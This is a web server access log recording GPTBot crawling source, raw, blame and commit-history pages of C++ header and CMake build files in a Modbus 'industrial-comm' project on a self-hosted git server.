"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:07:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:07:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:07:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11316] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:07:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12897] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:16:07:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11314] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:07:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:16:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9995] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:16:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11820] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12898] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:16:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:16:08:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:16:08:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9991] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:16:08:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13638] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:16:08:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10237] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:16:08:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12758] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:08:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12508] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:08:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10523] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:16:08:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12895] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:16:08:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10246] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:16:08:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11520] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:16:08:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:16:08:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11822] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:08:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:08:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:08:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11431] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:08:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10434] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:16:08:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:16:08:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12897] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:16:08:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10245] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:16:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13639] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:16:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:16:08:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12848] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:08:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10243] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:16:08:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:16:08:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11518] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:16:08:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9995] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:16:08:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10524] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:16:08:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:16:08:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:08:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10241] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:16:08:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:08:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11169] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:16:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10235] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:16:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13025] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:16:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:16:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13029] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:16:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12014] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:16:08:21 +0000] - 200 200 